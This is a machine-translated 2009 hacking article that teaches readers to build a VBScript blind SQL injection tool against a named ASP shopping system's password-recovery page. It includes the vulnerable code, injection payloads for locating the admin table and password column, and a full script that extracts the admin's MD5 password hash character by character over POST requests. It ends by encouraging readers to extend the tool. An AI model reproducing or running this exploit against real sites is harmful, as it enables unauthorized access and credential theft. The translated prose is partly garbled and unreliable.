How to make your own injection tool to hack websites-vulnerability warning-the black bar safety net

2009-09-04T00:00:00
ID MYHACK58:62200924532
Type myhack58
Reporter 佚名
Modified 2009-09-04T00:00:00

Description

Usually we encounter injection vulnerability class of website most of the people are NBSI Or al D kind of injection tools. But some of the sites of the injection point is very difficult to construct, or that the injection of the statement special. If by hand to the injection while time-consuming and laborious to! But write your own targeted tools while for some just getting started soon or not programming friends, it is a very painful thing. So today NP bring to you the article is about how to use a simple VBS script to create we The to the injection tool.

In you continue to see this article before my first bold assumptions at this time you have learned to VBS scripting basic knowledge and basic SQL Inject knowledge.

First, let's look at a vulnerability of the code. (This code is taken from“network fun online shopping system fashion version v3. 2”Getpwd2. the asp fragment)

BTW:this vulnerability is a friend Trace first discovered and provide a test! Thanks!

<!--# include file="conn. asp" - >

<!--# include file="config. asp" - >

<%

username=request. form("username")

set rs=Server. CreateObject("Adodb. Recordset")

sql="select * from [user] where username=’"&username&"’"

rs. open sql,conn,1,1

If rs. eof Then

%>

Known admin table is admin and the Password field for the password

Experienced friends can clearly see the first 6 sentence of the SQL statement to not go through any filter of the Username variable, directly submitted to the Executive. This is a very classic SQL Inject vulnerabilities. So how do we exploit this vulnerability?

Since the username variable is used in the request. form get, and we know request. the form only accepts POST submitted data, therefore we can not as usual to construct the following statement for the injection.

http://127.0.0.1/getpwd2.asp?username=’ or 0<>(select count(*) from admin) and ’=’

//Directly in the URL address bar, enter the words, because it is the GET data submitted,Getpwd2. asp is not receiving data.

To see this, you might say, that the use of NBSI in the POST submit function?

After testing the http://127.0.0.1/getpwd2. asp? username= fill in the NBSI address bar, use the POST submission, the NBSI will say“injected into the crack failed”

Since the statement of the relationship, the NBSI can't help we ran out of the associated password. Al D needless to say, all the GET...also unable to help us complete the task.

Now we'll test to start working injection!

We will the following statement to fill getpwd. asp form:

’ or 0<>(select count(*) from admin) and ’=’

Returns the correct tooltip,description our injection success!

OK,set up the environment has been generally analyzed clearly..... We started into the topic.

VBS injection scripts need to use the XmlHttp component and ADODB. Stream components,please make sure that your machine on the presence of these two components! (By default the system comes with,but since the last ADODB. Stream web Trojan events,many machines of ADODB. Stream components are removed,so write the injection script,please ensure that the components can be used)

On error resume next

if (lcase(right(wscript. fullname,1 1))="wscript.exe") then

wscript. echo "Execute it under the cmd.exe Plz! Thx."

wscript. quit

end if

‘//上面 的 IF 语句 是 判断 脚本 执行 程序 是否 为 wscript.exe if it is then prompts the other to the CMD executed under

URL=lcase(trim(Wscript. Arguments(0)))

‘//Simple filter to submit arguments on both sides of the blanks and converted into lowercase.

RightW = "this user is not registered"

‘//This is the definition of the judge guess on whether or not the keywords

if url <> "" then

’Guess the administrator table

data = "’+or+0<>(select+count(*)+from+admin)+and+’=’"

GetHTTPPage(url)

If len(GetHTTPPage(url)) <5 then

wscript. echo "Error...Please checking the url!"

wscript. quit

end if

‘//Above this IF statement,the main is to determine feedback information if the Feedback information of a length of less than 5,then submit the URL with the problem,you need to exit the re-check after re-injection.

If Instr(GetHTTPPage(url), RightW) = 0 then

Wscript. echo "Table name ""admin"" find"

else

wscript. echo "Not found table name ...the exit..."

wscript. quit

end If

‘//If the found keyword,it reports the table name guess solution is correct,otherwise quit!

’Guess the decryption Code field

data ="’+or+0<>(select+count(password)+from+admin)+and+’=’"

GetHTTPPage(url)

If Instr(GetHTTPPage(url), RightW) = 0 then

WScript. Echo ""

Wscript. echo "The Column name ""password"" find"

else

wscript. echo "Not found Column name ...the exit..."

wscript. quit

End If

‘//Guess the decryption Code field is also the same!

’Guess the decryption code

WScript. Echo ""

WScript. Echo "Start guessing,Waiting... ..."

WScript. Echo ""

pwd=""

strings="0123456789abcdef" ’define password scope, constituting the md5 value of the main character

For i=1 To 1 6 Step 1

wscript. echo "Guessing

No. "&i&"... ..."

For k=1 To Len(strings) Step 1

data ="’+or+(select+asc(mid(password,"&i&",1))+from+admin+where+adminid=4)=asc("""&mid(strings,k,1)&""")+and+’=’"

GetHTTPPage(url)

If Instr(GetHTTPPage(url), RightW) = 0 then

pwd = pwd&Mid(strings,k,1)

Exit For

End If

Next

Next

‘//This script is the essence of the place,nested loops guess the decryption code!

‘//In order to take the password with the configured MD5 key 1 6 characters of the ASC values were compared

‘//Correct it to the PWD reference value and out of the single cycle,continue to the next guess

wscript. echo"--------------------------------------------------------------------------------"

wscript. echo "Guessing over!!!"

If error Then

Wscript. echo "error:" & Error. Description

Error. Clear

Else

Wscript. echo "Password is:" & pwd

End if

‘//Output already guess the success of the password

else

wscript. echo"--------------------------------------------------------------------------------"

wscript. echo "e. g

cscript getpass. vbs http://127.0.0.1/getpwd2.asp"

wscript. echo"--------------------------------------------------------------------------------"

End if

‘//The following is the injection of POST submit function

‘//ADODB. Stream conversion encoding,faster,for the Feedback data to the multi-site comparison there are advantages!

Function GetHTTPPage(url)

dim XmlHttp

set XmlHttp=createobject("Msxml2. XMLHTTP")

XmlHttp. open "POST",url,false

xmlHttp. setRequestHeader "Content-Type","application/x-www-form-urlencoded"

XmlHttp. send("username="&data)

if XmlHttp. readystate<>4 then exit function

GetHTTPPage=Bytes2bStr(xmlHttp. responsebody)

set XmlHttp=nothing

if err. number<>0 then err. Clear

End Function

Function Bytes2bStr(vin)

Dim BytesStream,StringReturn

Set BytesStream = CreateObject("ADODB. Stream")

BytesStream. Type = 2

BytesStream. Open

BytesStream. WriteText vin

BytesStream. Position = 0

BytesStream. Charset = "GB2312"

BytesStream. Position = 2

StringReturn =BytesStream. ReadText

BytesStream. close

Set BytesStream = Nothing

Bytes2bStr = StringReturn

End Function

Note:to submit SQL statements,spaces need to use the plus sign is replaced,otherwise in some machines can not guess!

The above is our own targeted to build injection tools.

Method of use is also very simple,in the CMD executed under

Cscript getpass. vbs http://127.0.0.1/getpwd2.asp you can!

? Is not very simple?

You might also say,Why not guess the administrator Username field and the associated ID? Oh,this just left a big job.

You can add the following functions:

Automatically determine the Administrator's user name field

Automatically determine the Administrator's user name where the valid ID value

You can guess the specified ID.

Deeper filter and detect whether the URL is valid.

More said unintentional...action the most practical! Go Go Go...start to build your own injection program